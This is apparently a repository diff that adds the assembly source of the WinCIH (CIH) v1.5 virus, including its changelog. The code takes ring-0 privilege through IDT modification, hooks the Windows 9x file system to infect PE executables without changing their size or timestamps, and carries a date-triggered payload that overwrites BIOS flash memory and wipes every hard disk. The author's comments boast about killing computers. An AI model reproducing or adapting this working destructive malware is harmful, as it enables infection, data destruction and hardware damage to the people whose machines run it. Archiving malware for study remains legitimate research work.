edx, (VxDCallIDTable+(ecx-1)*04h-@9)[esi] + mov [eax+2], edx + movzx edx, byte ptr (VxDCallAddressTable+ecx-1-@9)[esi] + sub eax, edx + loop LoopOfRestoreVxDCallID + +; *************************** +; * Let's Write * +; * Virus Code to the File * +; *************************** + +WriteVirusCodeToFile: + mov eax, dr1 + mov ebx, [eax+10h] + mov edi, [eax] + +LoopOfWriteVirusCodeToFile: + + pop ecx + jecxz SetFileModificationMark + mov esi, ecx + mov eax, 0d601h + pop edx + pop ecx + call edi ; VXDCall IFSMgr_Ring0_FileIO + jmp LoopOfWriteVirusCodeToFile + +; *************************** +; * Let's Set CF = 1 ==> * +; * Need to Restore File * +; * Modification Time * +; *************************** + +SetFileModificationMark: + pop ebx + pop eax + stc ; Enable CF(Carry Flag) + pushf + +; ************************************* +; * Close File * +; ************************************* + +CloseFile: + xor eax, eax + mov ah, 0d7h + call edi ; VXDCall IFSMgr_Ring0_FileIO + +; ************************************* +; * Need to Restore File Modification * +; * Time !? * +; ************************************* + + popf + pop esi + jnc IsKillComputer + +; ************************************* +; * Restore File Modification Time * +; ************************************* + + mov ebx, edi + mov ax, 4303h + mov ecx, (FileModificationTime-@7)[esi] + mov edi, (FileModificationTime+2-@7)[esi] + call ebx ; VXDCall IFSMgr_Ring0_FileIO + +; ************************************* +; * Disable OnBusy * +; ************************************* + +DisableOnBusy: + dec byte ptr (OnBusy-@7)[esi] ; Disable OnBusy + +; ************************************* +; * Call Previous FileSystemApiHook * +; ************************************* + +prevhook: + popad + mov eax, dr0 ; + jmp [eax] ; Jump to prevhook + +; ************************************* +; * Call the Function that the IFS * +; * Manager Would Normally Call to * +; * Implement this Particular I/O * +; * Request. * +; ************************************* + +pIFSFunc: + mov ebx, esp + push dword ptr [ebx+20h+04h+14h] ; Push pioreq + call [ebx+20h+04h] ; Call pIFSFunc + pop ecx ; + mov [ebx+1ch], eax ; Modify EAX Value in Stack + +; *************************** +; * After Calling pIFSFunc, * +; * Get Some Data from the * +; * Returned pioreq. * +; *************************** + + cmp dword ptr [ebx+20h+04h+04h], 00000024h + jne QuitMyVirusFileSystemHook + +; ***************** +; * Get the File * +; * Modification * +; * Date and Time * +; * in DOS Format.* +; ***************** + + mov eax, [ecx+28h] + mov (FileModificationTime-@6)[esi], eax + +; *************************** +; * Quit My Virus' * +; * IFSMgr_FileSystemHook * +; *************************** + +QuitMyVirusFileSystemHook: + + popad + ret + +; ************************************* +; * Kill Computer !? ... *^_^* * +; ************************************* + +IsKillComputer: + ; Get Now Day from BIOS CMOS + mov al, 07h + out 70h, al + in al, 71h + xor al, 01h ; ??/26/???? + +IF DEBUG + jmp DisableOnBusy +ELSE + jnz DisableOnBusy +ENDIF + +; ************************************** +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; ************************************** + +; *************************** +; * Kill BIOS EEPROM * +; *************************** + + mov bp, 0cf8h + lea esi, IOForEEPROM-@7[esi] + +; *********************** +; * Show BIOS Page in * +; * 000E0000 - 000EFFFF * +; * ( 64 KB ) * +; *********************** + + mov edi, 8000384ch + mov dx, 0cfeh + cli + call esi + +; *********************** +; * Show BIOS Page in * +; * 000F0000 - 000FFFFF * +; * ( 64 KB ) * +; *********************** + + mov di, 0058h + dec edx ; and al,0fh + mov word ptr (BooleanCalculateCode-@10)[esi], 0f24h + call esi + +; *********************** +; * Show the BIOS Extra * +; * ROM Data in Memory * +; * 000E0000 - 000E01FF * +; * ( 512 Bytes ) * +; * , and the Section * +; * of Extra BIOS can * +; * be Writted... * +; *********************** + + lea ebx, EnableEEPROMToWrite-@10[esi] + mov eax, 0e5555h + mov ecx, 0e2aaah + call ebx + mov byte ptr [eax], 60h + push ecx + loop $ + +; *********************** +; * Kill the BIOS Extra * +; * ROM Data in Memory * +; * 000E0000 - 000E007F * +; * ( 80h Bytes ) * +; *********************** + + xor ah, ah + mov [eax], al + + xchg ecx, eax + loop $ + +; *********************** +; * Show and Enable the * +; * BIOS Main ROM Data * +; * 000E0000 - 000FFFFF * +; * ( 128 KB ) * +; * can be Writted... * +; *********************** + + mov eax, 0f5555h + pop ecx + mov ch, 0aah + call ebx + mov byte ptr [eax], 20h + + loop $ + +; *********************** +; * Kill the BIOS Main * +; * ROM Data in Memory * +; * 000FE000 - 000FE07F * +; * ( 80h Bytes ) * +; *********************** + + mov ah, 0e0h + mov [eax], al + +; *********************** +; * Hide BIOS Page in * +; * 000F0000 - 000FFFFF * +; * ( 64 KB ) * +; *********************** + ; or al,10h + mov word ptr (BooleanCalculateCode-@10)[esi], 100ch + call esi + +; *************************** +; * Kill All HardDisk * +; *************************************************** +; * IOR Structure of IOS_SendCommand Needs * +; *************************************************** +; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? * +; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 * +; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? * +; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? * +; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? * +; *************************************************** + +KillHardDisk: + xor ebx, ebx + mov bh, FirstKillHardDiskNumber + push ebx + sub esp, 2ch + push 0c0001000h + mov bh, 08h + push ebx + push ecx + push ecx + push ecx + push 40000501h + inc ecx + push ecx + push ecx + mov esi, esp + sub esp, 0ach + +LoopOfKillHardDisk: + int 20h + dd 00100004h ; VXDCall IOS_SendCommand + cmp word ptr [esi+06h], 0017h + je KillNextDataSection + +ChangeNextHardDisk: + inc byte ptr [esi+4dh] + jmp LoopOfKillHardDisk + +KillNextDataSection: + add dword ptr [esi+10h], ebx + mov byte ptr [esi+4dh], FirstKillHardDiskNumber + jmp LoopOfKillHardDisk + +; *************************** +; * Enable EEPROM to Write * +; *************************** + +EnableEEPROMToWrite: + mov [eax], cl + mov [ecx], al + mov byte ptr [eax], 80h + mov [eax], cl + mov [ecx], al + ret + +; *************************** +; * IO for EEPROM * +; *************************** + +IOForEEPROM: +@10 = IOForEEPROM + + xchg eax, edi + xchg edx, ebp + out dx, eax + xchg eax, edi + xchg edx, ebp + in al, dx + +BooleanCalculateCode = $ + or al, 44h + xchg eax, edi + xchg edx, ebp + out dx, eax + xchg eax, edi + xchg edx, ebp + out dx, al + ret + +; ********************************************************* +; * Static Data * +; ********************************************************* + +LastVxDCallAddress = IFSMgr_Ring0_FileIO +VxDCallAddressTable db 00h + db IFSMgr_RemoveFileSystemApiHook-_PageAllocate + db UniToBCSPath-IFSMgr_RemoveFileSystemApiHook + db IFSMgr_Ring0_FileIO-UniToBCSPath +VxDCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032h +VxDCallTableSize = ($-VxDCallIDTable)/04h + +; ********************************************************* +; * Virus Version Copyright * +; ********************************************************* + +VirusVersionCopyright db 'WinCIH ver 1.5 by TATUNG, Thailand' + +; ********************************************************* +; * Virus Size * +; ********************************************************* + +VirusSize = $ +; + SizeOfVirusCodeSectionTableEndMark(04h) +; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h) +; + SizeOfTheFirstVirusCodeSectionTable(04h) + +; ********************************************************* +; * Dynamic Data * +; ********************************************************* + +VirusGameDataStartAddress = VirusSize +@6 = VirusGameDataStartAddress +OnBusy db 0 +FileModificationTime dd ? + +FileNameBuffer db FileNameBufferSize dup(?) +@7 = FileNameBuffer + +DataBuffer = $ +@8 = DataBuffer +NumberOfSections dw ? +TimeDateStamp dd ? +SymbolsPointer dd ? +NumberOfSymbols dd ? +SizeOfOptionalHeader dw ? +_Characteristics dw ? +Magic dw ? +LinkerVersion dw ? +SizeOfCode dd ? +SizeOfInitializedData dd ? +SizeOfUninitializedData dd ? +AddressOfEntryPoint dd ? +BaseOfCode dd ? +BaseOfData dd ? +ImageBase dd ? +@9 = $ +SectionAlignment dd ? +FileAlignment dd ? +OperatingSystemVersion dd ? +ImageVersion dd ? +SubsystemVersion dd ? +Reserved dd ? +SizeOfImage dd ? +SizeOfHeaders dd ? +SizeOfImageHeaderToRead = $-NumberOfSections +NewAddressOfEntryPoint = DataBuffer ; DWORD +SizeOfImageHeaderToWrite= 04h +StartOfSectionTable = @9 +SectionName = StartOfSectionTable ; QWORD +VirtualSize = StartOfSectionTable+08h ; DWORD +VirtualAddress = StartOfSectionTable+0ch ; DWORD +SizeOfRawData = StartOfSectionTable+10h ; DWORD +PointerToRawData = StartOfSectionTable+14h ; DWORD +PointerToRelocations = StartOfSectionTable+18h ; DWORD +PointerToLineNumbers = StartOfSectionTable+1ch ; DWORD +NumberOfRelocations = StartOfSectionTable+20h ; WORD +NumberOfLinenNmbers = StartOfSectionTable+22h ; WORD +Characteristics = StartOfSectionTable+24h ; DWORD +SizeOfScetionTable = Characteristics+04h-SectionName + +; ********************************************************* +; * Virus Total Need Memory * +; ********************************************************* + +VirusNeedBaseMemory = $ +VirusTotalNeedMemory = @9 +; + NumberOfSections(??)*SizeOfScetionTable(28h) +; + SizeOfVirusCodeSectionTableEndMark(04h) +; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h) +; + SizeOfTheFirstVirusCodeSectionTable(04h) +; ********************************************************* + +VirusGame ENDS + END FileHeader diff --git a/MSDOS/Virus.MSDOS.Unknown.cih15_2.asm b/MSDOS/Virus.MSDOS.Unknown.cih15_2.asm new file mode 100644 index 00000000..a03c5e14 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cih15_2.asm @@ -0,0 +1,1402 @@ +; **************************************************************************** +; * The Virus Program Information * +; **************************************************************************** +; * * +; * Designer : CIH Source : TTIT of TATUNG in Taiwan * +; * Create Date : 04/26/1998 E-mail : WinCIH.Tatung@usa.net * +; * Modification Time : 06/01/1998 Version : 1.5 * +; * * +; * Turbo Assembler Version 5.0 : Tasm /m cih * +; * Turbo Link Version 5.01 : Tlink /3 /t cih, cih.exe * +; * * +; *==========================================================================* +; * Modification History * +; *==========================================================================* +; * v1.0 1. Create the Virus Program. * +; * 2. The Virus Modifies IDT to Get Ring0 Privilege. * +; * 04/26/1998 3. Virus Code doesn't Reload into System. * +; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. * +; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. * +; * 6. When System Opens Existing PE File, the File will be * +; * Infected, and the File doesn't be Reinfected. * +; * 7. It is also Infected, even the File is Read-Only. * +; * 8. When the File is Infected, the Modification Date and Time * +; * of the File also don't be Changed. * +; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call * +; * Previous FileSystemApiHook, it will Call the Function * +; * that the IFS Manager Would Normally Call to Implement * +; * this Particular I/O Request. * +; * 10. The Virus Size is only 656 Bytes. * +; *==========================================================================* +; * v1.1 1. Especially, the File that be Infected will not Increase * +; * it's Size... ^__^ * +; * 05/15/1998 2. Hook and Modify Structured Exception Handing. * +; * When Exception Error Occurs, Our OS System should be in * +; * Windows NT. So My Cute Virus will not Continue to Run, * +; * it will Jmup to Original Application to Run. * +; * 3. Use Better Algorithm, Reduce Virus Code Size. * +; * 4. The Virus "Basic" Size is only 796 Bytes. * +; *==========================================================================* +; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... * +; * 2. Modify the Bug of v1.1 * +; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. * +; *==========================================================================* +; * v1.3 1. Modify the Bug that WinZip Self-Extractor Occurs Error. * +; * So When Open WinZip Self-Extractor ==> Don't Infect it. * +; * 05/24/1998 2. The Virus "Basic" Size is 1010 Bytes. * +; *==========================================================================* +; * v1.4 1. Full Modify the Bug : WinZip Self-Extractor Occurs Error. * +; * 2. Change the Date of Killing Computers. * +; * 05/31/1998 3. Modify Virus Version Copyright. * +; * 4. The Virus "Basic" Size is 1019 Bytes. * +; **************************************************************************** +; * v1.5 1. Full Modify the Bug : Change Harddisk Killing Port * +; * 2. Modify Virus Version Copyright. * +; * 06/01/1998 3. Clear Garbage in Source Code. * +; * 4. The Virus "Small" Size in 10xx Bytes. * +; **************************************************************************** + + .586 + +; **************************************************************************** +; * Original PE Executable File(Don't Modify this Section) * +; **************************************************************************** + +OriginalAppEXE SEGMENT + +FileHeader: + db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h + db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h + db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h + db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh + db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h + db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h + db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh + db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh + db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h + db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah + db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h + db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h + db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h + db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h + db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h + db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h + db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h + db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h + db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h + db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h + db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h + db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + dd 00000000h, VirusSize + +OriginalAppEXE ENDS + +; **************************************************************************** +; * My Virus Game * +; **************************************************************************** + +; ********************************************************* +; * Constant Define * +; ********************************************************* + +TRUE = 1 +FALSE = 0 + +DEBUG = TRUE + +IF DEBUG + + FirstKillHardDiskNumber = 82h + HookExceptionNumber = 06h + +ELSE + + FirstKillHardDiskNumber = 81h + HookExceptionNumber = 04h + +ENDIF + + +FileNameBufferSize = 7fh + +; ********************************************************* +; ********************************************************* + +VirusGame SEGMENT + + ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame + ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame + +; ********************************************************* +; * Ring3 Virus Game Initial Program * +; ********************************************************* + +MyVirusStart: + push ebp + +; ************************************* +; * Let's Modify Structured Exception * +; * Handing, Prevent Exception Error * +; * Occurrence, Especially in NT. * +; ************************************* + + lea eax, [esp-04h*2] + xor ebx, ebx + xchg eax, fs:[ebx] + call @0 +@0: + pop ebx + lea ecx, StopToRunVirusCode-@0[ebx] + push ecx + push eax + +; ************************************* +; * Let's Modify * +; * IDT(Interrupt Descriptor Table) * +; * to Get Ring0 Privilege... * +; ************************************* + + push eax ; + sidt [esp-02h] ; Get IDT Base Address + pop ebx ; + add ebx, HookExceptionNumber*08h+04h ; ZF = 0 + cli + mov ebp, [ebx] ; Get Exception Base + mov bp, [ebx-04h] ; Entry Point + lea esi, MyExceptionHook-@1[ecx] + push esi + mov [ebx-04h], si ; + shr esi, 16 ; Modify Exception + mov [ebx+02h], si ; Entry Point Address + pop esi + +; ************************************* +; * Generate Exception to Get Ring0 * +; ************************************* + + int HookExceptionNumber ; GenerateException +ReturnAddressOfEndException = $ + +; ************************************* +; * Merge All Virus Code Section * +; ************************************* + + push esi + mov esi, eax + +LoopOfMergeAllVirusCodeSection: + + mov ecx, [eax-04h] + rep movsb + sub eax, 08h + mov esi, [eax] + or esi, esi + jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1 + jmp LoopOfMergeAllVirusCodeSection + +QuitLoopOfMergeAllVirusCodeSection: + + pop esi + +; ************************************* +; * Generate Exception Again * +; ************************************* + + int HookExceptionNumber ; GenerateException Again + +; ************************************* +; * Let's Restore * +; * Structured Exception Handing * +; ************************************* + +ReadyRestoreSE: + sti + xor ebx, ebx + jmp RestoreSE + +; ************************************* +; * When Exception Error Occurs, * +; * Our OS System should be in NT. * +; * So My Cute Virus will not * +; * Continue to Run, it Jmups to * +; * Original Application to Run. * +; ************************************* + +StopToRunVirusCode: +@1 = StopToRunVirusCode + + xor ebx, ebx + mov eax, fs:[ebx] + mov esp, [eax] + +RestoreSE: + pop dword ptr fs:[ebx] + pop eax + +; ************************************* +; * Return Original App to Execute * +; ************************************* + + pop ebp + push 00401000h ; Push Original +OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack + ret ; Return to Original App Entry Point + +; ********************************************************* +; * Ring0 Virus Game Initial Program * +; ********************************************************* + +MyExceptionHook: +@2 = MyExceptionHook + jz InstallMyFileSystemApiHook + +; ************************************* +; * Do My Virus Exist in System !? * +; ************************************* + + mov ecx, dr0 + jecxz AllocateSystemMemoryPage + add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException + +; ************************************* +; * Return to Ring3 Initial Program * +; ************************************* + +ExitRing0Init: + mov [ebx-04h], bp ; + shr ebp, 16 ; Restore Exception + mov [ebx+02h], bp ; + iretd + +; ************************************* +; * Allocate SystemMemory Page to Use * +; ************************************* + +AllocateSystemMemoryPage: + + mov dr0, ebx ; Set the Mark of My Virus Exist in System + push 00000000fh ; + push ecx ; + push 0ffffffffh ; + push ecx ; + push ecx ; + push ecx ; + push 000000001h ; + push 000000002h ; + int 20h ; VMMCALL _PageAllocate +_PageAllocate = $ ; + dd 00010053h ; Use EAX, ECX, EDX, and flags + add esp, 08h*04h + xchg edi, eax ; EDI = SystemMemory Start Address + lea eax, MyVirusStart-@2[esi] + iretd ; Return to Ring3 Initial Program + +; ************************************* +; * Install My File System Api Hook * +; ************************************* + +InstallMyFileSystemApiHook: + + lea eax, FileSystemApiHook-@6[edi] + + push eax ; + int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook +IFSMgr_InstallFileSystemApiHook = $ + dd 00400067h ; Use EAX, ECX, EDX, and flags + mov dr0, eax ; Save OldFileSystemApiHook Address + pop eax ; EAX = FileSystemApiHook Address + ; Save Old IFSMgr_InstallFileSystemApiHook Entry Point + mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi] + mov edx, [ecx] + mov OldInstallFileSystemApiHook-@3[eax], edx + ; Modify IFSMgr_InstallFileSystemApiHook Entry Point + lea eax, InstallFileSystemApiHook-@3[eax] + mov [ecx], eax + cli + jmp ExitRing0Init + +; ********************************************************* +; * Code Size of Merge Virus Code Section * +; ********************************************************* + +CodeSizeOfMergeVirusCodeSection = offset $ + +; ********************************************************* +; * IFSMgr_InstallFileSystemApiHook * +; ********************************************************* + +InstallFileSystemApiHook: + push ebx + call @4 ; +@4: ; + pop ebx ; mov ebx, offset FileSystemApiHook + add ebx, FileSystemApiHook-@4 ; + push ebx + int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook +IFSMgr_RemoveFileSystemApiHook = $ + dd 00400068h ; Use EAX, ECX, EDX, and flags + pop eax + ; Call Original IFSMgr_InstallFileSystemApiHook + ; to Link Client FileSystemApiHook + push dword ptr [esp+8] + call OldInstallFileSystemApiHook-@3[ebx] + pop ecx + push eax + ; Call Original IFSMgr_InstallFileSystemApiHook + ; to Link My FileSystemApiHook + push ebx + call OldInstallFileSystemApiHook-@3[ebx] + pop ecx + mov dr0, eax ; Adjust OldFileSystemApiHook Address + pop eax + pop ebx + ret + +; ********************************************************* +; * Static Data * +; ********************************************************* + +OldInstallFileSystemApiHook dd ? + +; ********************************************************* +; * IFSMgr_FileSystemHook * +; ********************************************************* + +; ************************************* +; * IFSMgr_FileSystemHook Entry Point * +; ************************************* + +FileSystemApiHook: +@3 = FileSystemApiHook + + pushad + call @5 ; +@5: ; + pop esi ; mov esi, offset VirusGameDataStartAddress + add esi, VirusGameDataStartAddress-@5 + +; ************************************* +; * Is OnBusy !? * +; ************************************* + + test byte ptr (OnBusy-@6)[esi], 01h ; if ( OnBusy ) + jnz pIFSFunc ; goto pIFSFunc + +; ************************************* +; * Is OpenFile !? * +; ************************************* + + ; if ( NotOpenFile ) + ; goto prevhook + lea ebx, [esp+20h+04h+04h] + cmp dword ptr [ebx], 00000024h + jne prevhook + +; ************************************* +; * Enable OnBusy * +; ************************************* + + inc byte ptr (OnBusy-@6)[esi] ; Enable OnBusy + +; ************************************* +; * Get FilePath's DriveNumber, * +; * then Set the DriveName to * +; * FileNameBuffer. * +; ************************************* +; * Ex. If DriveNumber is 03h, * +; * DriveName is 'C:'. * +; ************************************* + + add esi, FileNameBuffer-@6 + push esi + mov al, [ebx+04h] + cmp al, 0ffh + je CallUniToBCSPath + add al, 40h + mov ah, ':' + mov [esi], eax + inc esi + inc esi + +; ************************************* +; * UniToBCSPath * +; ************************************* +; * This Service Converts * +; * a Canonicalized Unicode Pathname * +; * to a Normal Pathname in the * +; * Specified BCS Character Set. * +; ************************************* + +CallUniToBCSPath: + push 00000000h + push FileNameBufferSize + mov ebx, [ebx+10h] + mov eax, [ebx+0ch] + add eax, 04h + push eax + push esi + int 20h ; VXDCall UniToBCSPath +UniToBCSPath = $ + dd 00400041h + add esp, 04h*04h + +; ************************************* +; * Is FileName '.EXE' !? * +; ************************************* + + cmp [esi+eax-04h], 'EXE.' + pop esi + jne DisableOnBusy + +IF DEBUG + +; ************************************* +; * Only for Debug * +; ************************************* + + cmp [esi+eax-06h], 'KCUF' + jne DisableOnBusy + +ENDIF + +; ************************************* +; * Is Open Existing File !? * +; ************************************* + + ; if ( NotOpenExistingFile ) + ; goto DisableOnBusy + cmp word ptr [ebx+18h], 01h + jne DisableOnBusy + +; ************************************* +; * Get Attributes of the File * +; ************************************* + + mov ax, 4300h + int 20h ; VXDCall IFSMgr_Ring0_FileIO +IFSMgr_Ring0_FileIO = $ + dd 00400032h + jc DisableOnBusy + push ecx + +; ************************************* +; * Get IFSMgr_Ring0_FileIO Address * +; ************************************* + + mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi] + mov edi, [edi] + +; ************************************* +; * Is Read-Only File !? * +; ************************************* + + test cl, 01h + jz OpenFile + +; ************************************* +; * Modify Read-Only File to Write * +; ************************************* + + mov ax, 4301h + xor ecx, ecx + call edi ; VXDCall IFSMgr_Ring0_FileIO + +; ************************************* +; * Open File * +; ************************************* + +OpenFile: + xor eax, eax + mov ah, 0d5h + xor ecx, ecx + xor edx, edx + inc edx + mov ebx, edx + inc ebx + call edi ; VXDCall IFSMgr_Ring0_FileIO + xchg ebx, eax ; mov ebx, FileHandle + +; ************************************* +; * Need to Restore * +; * Attributes of the File !? * +; ************************************* + + pop ecx + pushf + test cl, 01h + jz IsOpenFileOK + +; ************************************* +; * Restore Attributes of the File * +; ************************************* + + mov ax, 4301h + call edi ; VXDCall IFSMgr_Ring0_FileIO + +; ************************************* +; * Is Open File OK !? * +; ************************************* + +IsOpenFileOK: + popf + jc DisableOnBusy + +; ************************************* +; * Open File Already Succeed. ^__^ * +; ************************************* + + push esi ; Push FileNameBuffer Address to Stack + + pushf ; Now CF = 0, Push Flag to Stack + + add esi, DataBuffer-@7 ; mov esi, offset DataBuffer + +; *************************** +; * Get OffsetToNewHeader * +; *************************** + + xor eax, eax + mov ah, 0d6h + ; For Doing Minimal VirusCode's Length, + ; I Save EAX to EBP. + mov ebp, eax + push 00000004h + pop ecx + push 0000003ch + pop edx + call edi ; VXDCall IFSMgr_Ring0_FileIO + mov edx, [esi] + +; *************************** +; * Get 'PE\0' Signature * +; * of ImageFileHeader, and * +; * Infected Mark. * +; *************************** + + dec edx + mov eax, ebp + call edi ; VXDCall IFSMgr_Ring0_FileIO + +; *************************** +; * Is PE !? * +; *************************** +; * Is the File * +; * Already Infected !? * +; *************************** +; * WinZip Self-Extractor * +; * doesn't Have Infected * +; * Mark Because My Virus * +; * doesn't Infect it. * +; *************************** + + cmp dword ptr [esi], 00455000h + jne CloseFile + +; ************************************* +; * The File is ^o^ * +; * PE(Portable Executable) indeed. * +; ************************************* +; * The File isn't also Infected. * +; ************************************* + +; ************************************* +; * Start to Infect the File * +; ************************************* +; * Registers Use Status Now : * +; * * +; * EAX = 04h * +; * EBX = File Handle * +; * ECX = 04h * +; * EDX = 'PE\0\0' Signature of * +; * ImageFileHeader Pointer's * +; * Former Byte. * +; * ESI = DataBuffer Address ==> @8 * +; * EDI = IFSMgr_Ring0_FileIO Address * +; * EBP = D600h ==> Read Data in File * +; ************************************* +; * Stack Dump : * +; * * +; * ESP => ------------------------- * +; * | EFLAG(CF=0) | * +; * ------------------------- * +; * | FileNameBufferPointer | * +; * ------------------------- * +; * | EDI | * +; * ------------------------- * +; * | ESI | * +; * ------------------------- * +; * | EBP | * +; * ------------------------- * +; * | ESP | * +; * ------------------------- * +; * | EBX | * +; * ------------------------- * +; * | EDX | * +; * ------------------------- * +; * | ECX | * +; * ------------------------- * +; * | EAX | * +; * ------------------------- * +; * | Return Address | * +; * ------------------------- * +; ************************************* + + push ebx ; Save File Handle + push 00h ; Set VirusCodeSectionTableEndMark + +; *************************** +; * Let's Set the * +; * Virus' Infected Mark * +; *************************** + + push 01h ; Size + push edx ; Pointer of File + push edi ; Address of Buffer + +; *************************** +; * Save ESP Register * +; *************************** + + mov dr1, esp + +; *************************** +; * Let's Set the * +; * NewAddressOfEntryPoint * +; * ( Only First Set Size ) * +; *************************** + + push eax ; Size + +; *************************** +; * Let's Read * +; * Image Header in File * +; *************************** + + mov eax, ebp + mov cl, SizeOfImageHeaderToRead + add edx, 07h ; Move EDX to NumberOfSections + call edi ; VXDCall IFSMgr_Ring0_FileIO + +; *************************** +; * Let's Set the * +; * NewAddressOfEntryPoint * +; * ( Set Pointer of File, * +; * Address of Buffer ) * +; *************************** + + lea eax, (AddressOfEntryPoint-@8)[edx] + push eax ; Pointer of File + lea eax, (NewAddressOfEntryPoint-@8)[esi] + push eax ; Address of Buffer + +; *************************** +; * Move EDX to the Start * +; * of SectionTable in File * +; *************************** + + movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi] + lea edx, [eax+edx+12h] + 